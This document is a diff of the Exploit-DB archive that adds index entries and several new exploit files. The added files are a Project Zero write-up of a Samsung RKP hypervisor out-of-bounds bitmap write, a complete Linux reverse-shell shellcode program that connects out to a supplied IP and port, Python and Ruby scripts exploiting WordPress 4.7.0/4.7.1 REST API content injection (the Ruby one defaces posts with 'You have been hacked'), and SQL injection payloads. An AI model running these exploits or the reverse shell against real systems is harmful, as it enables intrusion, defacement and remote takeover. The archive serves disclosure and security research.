+25049,platforms/windows/remote/25049.txt,"Microsoft Windows Server 2000/2003/XP - winhlp32 Phrase Integer Overflow",2004-12-23,"flashsky fangxing",windows,remote,0
-25050,platforms/windows/remote/25050.txt,"Microsoft Windows 2000/2003/XP - winhlp32 Phrase Heap Overflow",2004-12-23,"flashsky fangxing",windows,remote,0
+25050,platforms/windows/remote/25050.txt,"Microsoft Windows Server 2000/2003/XP - winhlp32 Phrase Heap Overflow",2004-12-23,"flashsky fangxing",windows,remote,0
 25054,platforms/linux/remote/25054.txt,"konversation irc client 0.15 - Multiple Vulnerabilities",2005-01-19,wouter@coekaerts.be,linux,remote,0
 25057,platforms/windows/remote/25057.txt,"DivX Player 2.6 - '.Skin' File Directory Traversal",2005-01-21,"Luigi Auriemma",windows,remote,0
 25066,platforms/multiple/remote/25066.txt,"WebWasher Classic 2.2/2.3 - HTTP CONNECT Unauthorized Access",2005-01-28,"Oliver Karow",multiple,remote,0
@@ -13296,7 +13299,7 @@ id,file,description,date,author,platform,type,port
 25359,platforms/hardware/remote/25359.txt,"Linksys WET11 - Password Update Remote Authentication Bypass",2005-04-07,"Kristian Hermansen",hardware,remote,0
 25365,platforms/windows/remote/25365.txt,"AN HTTPD 1.42 - Arbitrary Log Content Injection",2005-04-08,"Tan Chew Keong",windows,remote,0
 25375,platforms/linux/remote/25375.pl,"KDE KMail 1.7.1 - HTML EMail Remote Email Content Spoofing",2005-04-11,"Noam Rathaus",linux,remote,0
-25384,platforms/windows/remote/25384.c,"Microsoft Windows 2000/XP - Internet Protocol Validation Remote Code Execution (2)",2005-04-16,"Yuri Gushin",windows,remote,0
+25384,platforms/windows/remote/25384.c,"Microsoft Windows Server 2000/XP - Internet Protocol Validation Remote Code Execution (2)",2005-04-16,"Yuri Gushin",windows,remote,0
 25385,platforms/windows/remote/25385.cpp,"Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow (MS05-020)",2005-04-12,"Miguel Tarasc",windows,remote,0
 25386,platforms/windows/remote/25386.txt,"Microsoft Internet Explorer 5.0.1 - DHTML Object Race Condition Memory Corruption",2005-04-12,"Berend-Jan Wever",windows,remote,0
 25391,platforms/multiple/remote/25391.txt,"XAMPP - Phonebook.php Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",multiple,remote,0
@@ -13868,8 +13871,8 @@ id,file,description,date,author,platform,type,port
 30627,platforms/windows/remote/30627.pl,"FSD 2.052/3.000 - sysuser.cc sysuser::exechelp Function HELP Command Remote Overflow",2007-10-01,"Luigi Auriemma",windows,remote,0
 30630,platforms/multiple/remote/30630.c,"id Software Doom 3 Engine - Console String Visualization Format String",2007-10-02,"Luigi Auriemma",multiple,remote,0
 30631,platforms/multiple/remote/30631.txt,"Google Mini Search Appliance 3.4.14 - IE Parameter Cross-Site Scripting",2007-09-20,Websecurity,multiple,remote,0
-30635,platforms/windows/remote/30635.pl,"Microsoft Windows 2000/2003 - Recursive DNS Spoofing (1)",2007-11-13,"Alla Berzroutchko",windows,remote,0
+30635,platforms/windows/remote/30635.pl,"Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)",2007-11-13,"Alla Berzroutchko",windows,remote,0
-30636,platforms/windows/remote/30636.pl,"Microsoft Windows 2000/2003 - Recursive DNS Spoofing (2)",2007-11-13,"Alla Berzroutchko",windows,remote,0
+30636,platforms/windows/remote/30636.pl,"Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)",2007-11-13,"Alla Berzroutchko",windows,remote,0
 30643,platforms/multiple/remote/30643.txt,"DropTeam 1.3.3 - Multiple Remote Vulnerabilities",2007-10-05,"Luigi Auriemma",multiple,remote,0
 30645,platforms/windows/remote/30645.txt,"Microsoft Windows - URI Handler Command Execution",2007-10-05,"Billy Rios",windows,remote,0
 30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 - SIP From Field HTML Injection",2007-10-09,"Radu State",hardware,remote,0
@@ -15866,6 +15869,7 @@ id,file,description,date,author,platform,type,port
 41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
 41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
+41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37012,8 +37016,8 @@ id,file,description,date,author,platform,type,port
 41011,platforms/php/webapps/41011.txt,"b2evolution 6.8.2 - Arbitrary File Upload",2016-12-29,"Li Fei",php,webapps,0
 41014,platforms/java/webapps/41014.txt,"Blackboard LMS 9.1 SP14 - Cross-Site Scripting",2017-01-09,Vulnerability-Lab,java,webapps,0
 41017,platforms/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-10,Vulnerability-Lab,hardware,webapps,0
-41023,platforms/php/webapps/41023.txt,"Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
+41023,platforms/php/webapps/41023.txt,"Itech Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
-41024,platforms/php/webapps/41024.txt,"Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
+41024,platforms/php/webapps/41024.txt,"Itech Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
 41028,platforms/php/webapps/41028.txt,"Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
 41029,platforms/php/webapps/41029.txt,"Online Food Delivery 2.04 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
 41032,platforms/php/webapps/41032.pl,"iTechscripts Freelancer Script 5.11 - 'sk' Parameter SQL Injection",2017-01-11,v3n0m,php,webapps,0
@@ -37131,23 +37135,31 @@ id,file,description,date,author,platform,type,port
 41184,platforms/php/webapps/41184.txt,"TrueConf Server 4.3.7 - Multiple Vulnerabilities",2017-01-29,LiquidWorm,php,webapps,0
 41185,platforms/php/webapps/41185.txt,"PHP PEAR 1.10.1 - Arbitrary File Download",2017-01-30,hyp3rlinx,php,webapps,0
 41186,platforms/php/webapps/41186.txt,"Caregiver Script 2.57 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
-41187,platforms/php/webapps/41187.txt,"Auction Script 6.49 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
+41187,platforms/php/webapps/41187.txt,"Itech Auction Script 6.49 - 'mcid' Parameter SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41188,platforms/php/webapps/41188.txt,"Itech B2B Script 4.28 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41189,platforms/php/webapps/41189.txt,"Itech Classifieds Script 7.27 - 'scat' Parameter SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41190,platforms/php/webapps/41190.txt,"Itech Dating Script 3.26 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41191,platforms/php/webapps/41191.txt,"Itech Freelancer Script 5.13 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41193,platforms/php/webapps/41193.txt,"Itech Multi Vendor Script 6.49 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
-41194,platforms/php/webapps/41194.txt,"Itech News Portal Script 6.28 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
+41194,platforms/php/webapps/41194.txt,"Itech News Portal Script 6.28 - 'inf' Parameter SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41195,platforms/php/webapps/41195.txt,"Itech Real Estate Script 3.12 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41197,platforms/php/webapps/41197.txt,"PHP Product Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0
 41198,platforms/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0
-41199,platforms/php/webapps/41199.txt,"Video Sharing Script 4.94 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
+41199,platforms/php/webapps/41199.txt,"Itech Video Sharing Script 4.94 - 'v' Parameter SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41200,platforms/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",php,webapps,0
 41205,platforms/hardware/webapps/41205.py,"Multiple Netgear Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",hardware,webapps,0
-41201,platforms/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
+41201,platforms/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
 41202,platforms/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
 41203,platforms/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
-41204,platforms/php/webapps/41204.txt,"Video Sharing Script 4.94 - 'uid' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
+41204,platforms/php/webapps/41204.txt,"Itech Video Sharing Script 4.94 - SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
 41208,platforms/hardware/webapps/41208.txt,"Netman 204 - Backdoor Account / Password Reset",2017-01-31,"Simon Gurney",hardware,webapps,0
 41209,platforms/php/webapps/41209.txt,"Joomla! Component JTAG Calendar 6.2.4 - 'search' Parameter SQL Injection",2017-01-28,"Persian Hack Team",php,webapps,0
 41210,platforms/php/webapps/41210.txt,"LogoStore - 'query' Parameter SQL Injection",2017-02-01,"Kaan KAMIS",php,webapps,0
+41223,platforms/linux/webapps/41223.py,"WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Python)",2017-02-02,leonjza,linux,webapps,0
+41224,platforms/linux/webapps/41224.rb,"WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Ruby)",2017-02-02,"Harsh Jaiswal",linux,webapps,0
+41231,platforms/php/webapps/41231.txt,"Itech Travel Portal Script 9.35 - SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps,0
+41225,platforms/php/webapps/41225.txt,"Property Listing Script - 'propid' Parameter Blind SQL Injection",2017-02-02,"Kaan KAMIS",php,webapps,0
+41226,platforms/php/webapps/41226.txt,"Itech Inventory Management Software 3.77 - SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps,0
+41230,platforms/php/webapps/41230.txt,"Itech Movie Portal Script 7.37 - SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps,0
+41228,platforms/php/webapps/41228.txt,"Itech News Portal Script 6.28 - 'sc' Parameter SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps,0
+41229,platforms/php/webapps/41229.txt,"Itech Auction Script 6.49 - 'pid' Parameter SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps,0

platforms/android/dos/41232.txt

@@ -0,0 +1,67 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=984
+
+As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to prevent privilege escalation attacks by "shielding" certain data structures within the hypervisor.
+
+During the initialization of RKP, a special command can be issued by EL1 kernel in order to mark the RKP read-only page as such in the stage 2 translation table. This command, "rkp_set_init_page_ro" (command code 0x51) has the following approximate high-level logic:
+
+__int64 rkp_set_init_page_ro(struct args* args_buffer)
+{
+  unsigned long page_pa = rkp_get_pa(args_buffer->arg0);
+  if ( page_pa < rkp_get_pa(text) || page_pa >= rkp_get_pa(etext) )
+  {
+    if ( !rkp_s2_page_change_permission(page_pa, 128LL, 0, 0) )// RO, XN
+      return rkp_debug_log("Cred: Unable to set permission for init cred", 0LL, 0LL, 0LL);
+  }
+  else
+  {
+    rkp_debug_log("Good init CRED is within RO range", 0LL, 0LL, 0LL);
+  }
+  rkp_debug_log("init cred page", 0LL, 0LL, 0LL);
+  return rkp_set_pgt_bitmap(page_pa, 0);
+}
+
+As we can see above, the function receives an address in the kernel VAS, and converts it to a physical address by adding a constant offset to it (the virt_to_phys offset for the kernel VAS). Then, the function proceeds to mark the resulting physical address as read-only and non-executable in the stage 2 translation table. Finally, the function proceeds to unset the bit in the RKP page-table bitmap corresponding to the given address. This is meant to indicate to EL1 that the address is protected by a stage 2 mapping.
+
+However, the function fails to validate the bounds of the given virtual address (or the resulting physical address). This means that an attacker can supply any arbitrary address and the function will accept it as valid input. Similarly, the implementation of "rkp_set_pgt_bitmap" performs no such validations:
+
+signed __int64 __fastcall rkp_set_pgt_bitmap(__int64 phys_addr, unsigned char set_or_unset)
+{
+  unsigned long phys_off = phys_addr - 0x80000000LL;
+  unsigned long bitmap_index = (phys_off >> 18) & 0x3FFFFFFFFFFFLL;
+  if ( !rkp_pgt_bitmap )
+    return 0LL;
+  unsigned long bit_offset = (phys_off >> 12) & 0x3F;
+  if ( set_or_unset & 0x80 )
+  {
+    spin_lock(&rkp_bitmap_spinlock);
+    *(rkp_pgt_bitmap + 8 * bitmap_index) |= 1LL << bit_offset;
+    spin_unlock(&rkp_bitmap_spinlock);
+    result = 1LL;
+  }
+  else
+  {
+    spin_lock(&rkp_bitmap_spinlock);
+    *(rkp_pgt_bitmap + 8 * bitmap_index) &= ~(1LL << bit_offset);
+    spin_unlock(&rkp_bitmap_spinlock);
+    result = 1LL;
+  }
+  return result;
+}
+
+The RKP page-table bitmap is only 0x20000 bytes large (each bit denotes a 4KB page, resulting in a supported range of at-most 0x100000000 bytes). The base physical address for the bitmap is the physical base address for the kernel range - 0x80000000.
+
+This means that if an attacker supplies any virtual address that is converted to a physical address not in the range of 0x80000000-0x180000000, the resulting "bitmap_index" will not be within the bitmap's bounds, causing the function to modify a bit out-of-bounds.
+
+An attacker can use this in order to specifically craft an input virtual address so that the resulting calculated "bitmap_index" will have any arbitrary value, thus resulting in a modification at an arbitrary offset from the base of the page-table bitmap, within the context of RKP.
+
+As the bitmap resides directly before RKP's code, an attacker can trivially use this primitive in order to modify the code or data pages belonging to RKP, thus gaining privilege escalation from EL1 to the context of RKP.
+
+I've verified this issue on an SM-G935F device, build version "XXS1APG3". The RKP version present on the device is "RKP4.2_CL7572479".
+
+Proof of concept for the RKP memory corruption in "rkp_set_init_page_ro".
+
+This PoC modifies an instruction within RKP's address space by repeatedly calling "rkp_set_init_page_ro" with faulty input addresses.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41232.zip

platforms/linux/shellcode/41220.c

@@ -0,0 +1,176 @@
+/**
+  Copyright © 2017 Odzhan. All Rights Reserved.
+
+  Redistribution and use in source and binary forms, with or without
+  modification, are permitted provided that the following conditions are
+  met:
+
+  1. Redistributions of source code must retain the above copyright
+  notice, this list of conditions and the following disclaimer.
+
+  2. Redistributions in binary form must reproduce the above copyright
+  notice, this list of conditions and the following disclaimer in the
+  documentation and/or other materials provided with the distribution.
+
+  3. The name of the author may not be used to endorse or promote products
+  derived from this software without specific prior written permission.
+
+  THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
+  IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+  WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+  DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
+  INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+  (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+  SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+  HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+  STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
+  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+  POSSIBILITY OF SUCH DAMAGE. */
+  
+#include <stdio.h>
+#include <string.h>
+#include <stdint.h>
+#include <stdlib.h>
+
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <sys/mman.h>
+
+// reverse shell for 32 and 64-bit Linux
+//
+#define RS_SIZE 129
+
+char RS[] = {
+  /* 0000 */ "\xb8\xfd\xff\xfb\x2d"         /* mov eax, 0x2dfbfffd             */
+  /* 0005 */ "\xbb\x80\xff\xff\xfe"         /* mov ebx, 0xfeffff80             */
+  /* 000A */ "\xf7\xd0"                     /* not eax                         */
+  /* 000C */ "\xf7\xd3"                     /* not ebx                         */
+  /* 000E */ "\x50"                         /* push rax                        */
+  /* 000F */ "\x50"                         /* push rax                        */
+  /* 0010 */ "\x54"                         /* push rsp                        */
+  /* 0011 */ "\x5f"                         /* pop rdi                         */
+  /* 0012 */ "\xab"                         /* stosd                           */
+  /* 0013 */ "\x93"                         /* xchg ebx, eax                   */
+  /* 0014 */ "\xab"                         /* stosd                           */
+  /* 0015 */ "\x54"                         /* push rsp                        */
+  /* 0016 */ "\x5d"                         /* pop rbp                         */
+  /* 0017 */ "\x31\xc0"                     /* xor eax, eax                    */
+  /* 0019 */ "\x99"                         /* cdq                             */
+  /* 001A */ "\xb0\x67"                     /* mov al, 0x67                    */
+  /* 001C */ "\x6a\x01"                     /* push 0x1                        */
+  /* 001E */ "\x5e"                         /* pop rsi                         */
+  /* 001F */ "\x6a\x02"                     /* push 0x2                        */
+  /* 0021 */ "\x5f"                         /* pop rdi                         */
+  /* 0022 */ "\x48\x75\x19"                 /* jnz 0x3e                        */
+  /* 0025 */ "\xb0\x29"                     /* mov al, 0x29                    */
+  /* 0027 */ "\x0f\x05"                     /* syscall                         */
+  /* 0029 */ "\x97"                         /* xchg edi, eax                   */
+  /* 002A */ "\x96"                         /* xchg esi, eax                   */
+  /* 002B */ "\xb0\x21"                     /* mov al, 0x21                    */
+  /* 002D */ "\x0f\x05"                     /* syscall                         */
+  /* 002F */ "\x83\xee\x01"                 /* sub esi, 0x1                    */
+  /* 0032 */ "\x79\xf7"                     /* jns 0x2b                        */
+  /* 0034 */ "\x55"                         /* push rbp                        */
+  /* 0035 */ "\x5e"                         /* pop rsi                         */
+  /* 0036 */ "\xb2\x10"                     /* mov dl, 0x10                    */
+  /* 0038 */ "\xb0\x2a"                     /* mov al, 0x2a                    */
+  /* 003A */ "\x0f\x05"                     /* syscall                         */
+  /* 003C */ "\xeb\x1f"                     /* jmp 0x5d                        */
+  /* 003E */ "\x56"                         /* push rsi                        */
+  /* 003F */ "\x5b"                         /* pop rbx                         */
+  /* 0040 */ "\x52"                         /* push rdx                        */
+  /* 0041 */ "\x53"                         /* push rbx                        */
+  /* 0042 */ "\x57"                         /* push rdi                        */
+  /* 0043 */ "\x54"                         /* push rsp                        */
+  /* 0044 */ "\x59"                         /* pop rcx                         */
+  /* 0045 */ "\xcd\x80"                     /* int 0x80                        */
+  /* 0047 */ "\x93"                         /* xchg ebx, eax                   */
+  /* 0048 */ "\x59"                         /* pop rcx                         */
+  /* 0049 */ "\xb0\x3f"                     /* mov al, 0x3f                    */
+  /* 004B */ "\xcd\x80"                     /* int 0x80                        */
+  /* 004D */ "\x49\x79\xf9"                 /* jns 0x49                        */
+  /* 0050 */ "\x6a\x10"                     /* push 0x10                       */
+  /* 0052 */ "\x55"                         /* push rbp                        */
+  /* 0053 */ "\x53"                         /* push rbx                        */
+  /* 0054 */ "\x54"                         /* push rsp                        */
+  /* 0055 */ "\x59"                         /* pop rcx                         */
+  /* 0056 */ "\x6a\x03"                     /* push 0x3                        */
+  /* 0058 */ "\x5b"                         /* pop rbx                         */
+  /* 0059 */ "\xb0\x66"                     /* mov al, 0x66                    */
+  /* 005B */ "\xcd\x80"                     /* int 0x80                        */
+  /* 005D */ "\x99"                         /* cdq                             */
+  /* 005E */ "\x31\xf6"                     /* xor esi, esi                    */
+  /* 0060 */ "\x50"                         /* push rax                        */
+  /* 0061 */ "\x50"                         /* push rax                        */
+  /* 0062 */ "\x50"                         /* push rax                        */
+  /* 0063 */ "\x54"                         /* push rsp                        */
+  /* 0064 */ "\x5b"                         /* pop rbx                         */
+  /* 0065 */ "\x53"                         /* push rbx                        */
+  /* 0066 */ "\x5f"                         /* pop rdi                         */
+  /* 0067 */ "\xc7\x07\x2f\x62\x69\x6e"     /* mov dword [rdi], 0x6e69622f     */
+  /* 006D */ "\xc7\x47\x04\x2f\x2f\x73\x68" /* mov dword [rdi+0x4], 0x68732f2f */
+  /* 0074 */ "\x40\x75\x04"                 /* jnz 0x7b                        */
+  /* 0077 */ "\xb0\x3b"                     /* mov al, 0x3b                    */
+  /* 0079 */ "\x0f\x05"                     /* syscall                         */
+  /* 007B */ "\x31\xc9"                     /* xor ecx, ecx                    */
+  /* 007D */ "\xb0\x0b"                     /* mov al, 0xb                     */
+  /* 007F */ "\xcd\x80"                     /* int 0x80                        */
+};
+
+void bin2file(void *p, int len)
+{
+  FILE *out = fopen("rs.bin", "wb");
+  if (out!= NULL)
+  {
+    fwrite(p, 1, len, out);
+    fclose(out);
+  }
+}
+
+void xcode(char *s, int len, uint32_t ip, int16_t port)
+{
+  uint8_t *p;
+  
+  p=(uint8_t*)mmap (0, len, 
+      PROT_EXEC | PROT_WRITE | PROT_READ, 
+      MAP_ANON  | MAP_PRIVATE, -1, 0);  
+
+  memcpy(p, s, len);
+  memcpy((void*)&p[3], &port, 2); // set the port  
+  memcpy((void*)&p[6], &ip,   4); // set the ip
+  
+  //bin2file(p, len);
+  
+  // execute
+  ((void(*)())p)();
+    
+  munmap ((void*)p, len);  
+}
+
+int main(int argc, char *argv[])
+{
+  uint32_t ip   = 0;
+  int16_t  port = 0;
+  
+  if (argc!=3) {
+    printf ("\nrs_test <ip> <port>\n");
+    return 0;
+  }
+  ip   = inet_addr(argv[1]);
+  port = atoi(argv[2]);
+  
+  if (port<0 || port>65535) {
+    printf ("\ninvalid port specified");
+    return 0;
+  }
+  port = htons(port);
+  // invert both to mask null bytes.
+  // obviously no rigorous checking here
+  ip   = ~ip;
+  port = ~port;
+  
+  xcode (RS, RS_SIZE, ip, port);
+  return 0;  
+}
+

platforms/linux/webapps/41223.py

@@ -0,0 +1,117 @@
+# Exploit Title: Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
+# Date: 2017-02-02
+# Exploit Author: @leonjza
+# Vendor Homepage: https://wordpress.org/
+# Software Link: https://wordpress.org/wordpress-4.7.zip
+# Version: Wordpress 4.7.0/4.7.1
+# Tested on: Debian Jessie
+#
+# PoC gist: https://gist.github.com/leonjza/2244eb15510a0687ed93160c623762ab
+#
+
+# 2017 - @leonjza
+#
+# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
+# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
+
+# Usage example:
+#
+# List available posts:
+#
+# $ python inject.py http://localhost:8070/
+# * Discovering API Endpoint
+# * API lives at: http://localhost:8070/wp-json/
+# * Getting available posts
+#  - Post ID: 1, Title: test, Url: http://localhost:8070/archives/1
+#
+# Update post with content from a file:
+#
+# $ cat content
+# foo
+#
+# $ python inject.py http://localhost:8070/ 1 content
+# * Discovering API Endpoint
+# * API lives at: http://localhost:8070/wp-json/
+# * Updating post 1
+# * Post updated. Check it out at http://localhost:8070/archives/1
+# * Update complete!
+
+import json
+import sys
+import urllib2
+
+from lxml import etree
+
+
+def get_api_url(wordpress_url):
+    response = urllib2.urlopen(wordpress_url)
+
+    data = etree.HTML(response.read())
+    u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]
+
+    # check if we have permalinks
+    if 'rest_route' in u:
+        print(' ! Warning, looks like permalinks are not enabled. This might not work!')
+
+    return u
+
+
+def get_posts(api_base):
+    respone = urllib2.urlopen(api_base + 'wp/v2/posts')
+    posts = json.loads(respone.read())
+
+    for post in posts:
+        print(' - Post ID: {}, Title: {}, Url: {}'
+              .format(post['id'], post['title']['rendered'], post['link']))
+
+
+def update_post(api_base, post_id, post_content):
+    # more than just the content field can be updated. see the api docs here:
+    # https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
+    data = json.dumps({
+        'content': post_content
+    })
+
+    url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
+    req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
+    response = urllib2.urlopen(req).read()
+
+    print('* Post updated. Check it out at {}'.format(json.loads(response)['link']))
+
+
+def print_usage():
+    print('Usage: {} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
+
+
+if __name__ == '__main__':
+
+    # ensure we have at least a url
+    if len(sys.argv) < 2:
+        print_usage()
+        sys.exit(1)
+
+    # if we have a post id, we need content too
+    if 2 < len(sys.argv) < 4:
+        print('Please provide a file with post content with a post id')
+        print_usage()
+        sys.exit(1)
+
+    print('* Discovering API Endpoint')
+    api_url = get_api_url(sys.argv[1])
+    print('* API lives at: {}'.format(api_url))
+
+    # if we only have a url, show the posts we have have
+    if len(sys.argv) < 3:
+        print('* Getting available posts')
+        get_posts(api_url)
+
+        sys.exit(0)
+
+    # if we get here, we have what we need to update a post!
+    print('* Updating post {}'.format(sys.argv[2]))
+    with open(sys.argv[3], 'r') as content:
+        new_content = content.readlines()
+
+    update_post(api_url, sys.argv[2], ''.join(new_content))
+
+    print('* Update complete!')

platforms/linux/webapps/41224.rb

@@ -0,0 +1,39 @@
+# Exploit Title: WP Content Injection
+# Date: 31 Jan' 2017
+# Exploit Author: Harsh Jaiswal
+# Vendor Homepage: http://wordpress.org
+# Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
+# Tested on: Backbox ubuntu Linux
+# Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
+# Credits : Marc, Sucuri, Brute
+# usage : gem install rest-client 
+# Lang : Ruby
+
+
+require 'rest-client'
+require 'json'
+puts "Enter Target URI (With wp directory)"
+targeturi = gets.chomp
+puts "Enter Post ID"
+postid = gets.chomp.to_i
+response = RestClient.post(
+  "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
+  {
+
+    "id" => "#{postid}justrawdata",
+    "title" => "You have been hacked",
+    "content" => "Hacked please update your wordpress version"
+
+
+  }.to_json,
+  :content_type => :json,
+  :accept => :json
+) {|response, request, result| response }
+if(response.code == 200)
+
+puts "Done! '#{targeturi}/index.php?p=#{postid}'"
+
+
+else
+puts "This site is not Vulnerable"
+end

platforms/php/webapps/41201.txt

@@ -14,6 +14,7 @@
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/message.php?pid=[SQL]
+# http://localhost/[PATH]/showSubcat.php?q=[SQL]
 # E.t.c
 # # # # #
 

platforms/php/webapps/41204.txt

@@ -14,5 +14,6 @@
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/channels.php?uid=[SQL]
+#http://localhost/[PATH]/faq_show.php?fid=[SQL]
 # E.t.c
 # # # # #

platforms/php/webapps/41225.txt

@@ -0,0 +1,19 @@
+Exploit Title: Property Listing Script – Time-Based Blind Injection
+Date: 02.02.2017
+Vendor Homepage: http://phprealestatescript.org/
+Software Link: http://phprealestatescript.org/property-listing-script.html
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+Advanced PHP Real-Estate Script, we have almost covered the Main features required for a Property Buy and Sell Listing Script.
+
+Vulnerable Url: http://locahost/property-list/property_view.php?propid=443[payload]
+Parameter: propid (GET)
+Type: AND/OR time-based blind
+
+Simple Payload:
+Payload: propid=443' AND SLEEP(5) AND 'FBop'='FBop

platforms/php/webapps/41226.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Itech Inventory Management Software v3.77 - SQL Injection
+# Google Dork: N/A
+# Date: 02.02.2017
+# Vendor Homepage: http://itechscripts.com/
+# Software Buy: http://www.itechscripts.com/inventory-management-software/
+# Demo: http://inventory.itechscripts.com/
+# Version: 3.77
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as employee user
+# http://localhost/[PATH]/notice-edit.php?aid=[SQL]
+# E.t.c...
+# # # # #

platforms/php/webapps/41228.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Itech News Portal Script v6.28 - 'sc' Parameter SQL Injection
+# Google Dork: N/A
+# Date: 02.02.2017
